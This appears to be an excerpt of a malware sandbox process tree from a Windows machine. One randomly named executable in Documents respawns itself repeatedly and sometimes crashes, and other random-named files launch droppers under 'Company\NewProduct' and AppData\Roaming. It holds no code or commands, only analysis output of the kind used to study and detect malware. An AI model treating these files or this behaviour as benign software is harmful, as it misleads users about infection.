C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:18056

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:18788

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12524

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:19332

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6740

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:16788

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:19700

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:17688

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:19644

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:16304

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:14844

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:15132

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:14116

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:20828

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:20176

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 21032 -s 28
13⤵
- Program crash
PID:20716

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21296

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:20568

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:5900

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:19848

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8972

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21704

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:1448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1448 -s 28
13⤵
- Program crash
PID:22788

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10016

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22896

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21752

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22860

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:23488

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22668

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8836

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22612

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:19160

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:24064

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22404

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:24224

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:20392

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12468

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:23692

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:23728

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:23892

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10924

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25124

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:24916

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 25492 -s 28
13⤵
- Program crash
PID:10124

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21416

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:24496

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25588

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:13320

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:4056

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:14532

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:19968

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22704

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:10744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10744 -s 28
13⤵
- Program crash
PID:9464

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22696

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22312

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:26260

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:26420

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21952

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12160

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6332

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25916

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:5316

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21396

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:27060

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:26732

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:27228

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:27116

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:18788

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:13980

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:18452

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:27904

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22084

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:27740

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:27696

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21332

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:22944

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:6256

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:26336

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25516

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:4676

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:8896

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:24740

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:16896

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:29156

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:28856

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:16012

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:11800

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21976

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25228

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:28484

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:29784

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:30060

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25000

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:29920

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:30256

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:29168

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25688

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:30176

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:30068

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:29112

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:21560

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:31216

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:19920

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:31108

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:20364

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:30716

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:31572

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:31496

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:32204

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:15452

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:28532

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:29016

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:32532

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:27216

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:23944

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:17188

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:33584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 33584 -s 28
13⤵
- Program crash
PID:27236

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:31840

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:31260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 31260 -s 28
13⤵
- Program crash
PID:25984

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:31832

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:28028

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:33372

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:29204

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:24204

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:34092

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:30912

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25468

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:32600

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:27780

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:30752

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:12512

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:3644

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:25780

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:33848

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:35032

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:33532

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:26104

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:32540

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:36420

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:13560

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:23340

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:34156

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:36804

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:31668

C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
12⤵
PID:32488

C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe
"C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe"
11⤵
PID:5588

C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe
"C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe"
12⤵
PID:7872

C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe
"C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe"
12⤵
PID:8076

C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe
"C:\Users\Admin\Documents\Hba206ujk_d_fGEi6pqHgaJf.exe"
12⤵
PID:5816

C:\Users\Admin\Documents\SDqPUZcc4IY80SeEYfOg7HhD.exe
"C:\Users\Admin\Documents\SDqPUZcc4IY80SeEYfOg7HhD.exe"
11⤵
PID:1288

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
12⤵
PID:6568

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
12⤵
PID:6596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6596 -s 1512
13⤵
- Program crash
PID:36660

C:\Program Files (x86)\Company\NewProduct\inst001.exe
"C:\Program Files (x86)\Company\NewProduct\inst001.exe"
12⤵
PID:6560

C:\Users\Admin\Documents\YCRLjt1TWfhexFAuWZgEmQDj.exe
"C:\Users\Admin\Documents\YCRLjt1TWfhexFAuWZgEmQDj.exe"
11⤵
PID:4964

C:\Users\Admin\AppData\Roaming\2526580.exe
"C:\Users\Admin\AppData\Roaming\2526580.exe"
12⤵
PID:6976

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6976 -s 2316
13⤵
- Program crash
PID:5192

C:\Users\Admin\AppData\Roaming\6766514.exe
"C:\Users\Admin\AppData\Roaming\6766514.exe"
12⤵
PID:6996

C:\Users\Admin\AppData\Roaming\1305191.exe
"C:\Users\Admin\AppData\Roaming\1305191.exe"
12⤵
PID:6240

